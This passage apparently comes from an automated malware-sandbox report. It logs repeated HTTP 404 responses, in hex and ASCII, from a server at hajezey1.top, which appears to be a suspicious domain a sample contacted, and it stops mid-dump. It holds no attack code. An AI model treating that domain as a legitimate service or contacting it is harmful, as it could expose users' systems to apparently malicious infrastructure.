0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:30:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:30:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:30:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:30:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:30:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:30:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:30:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:30:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:30:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:30:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:30:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:30:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 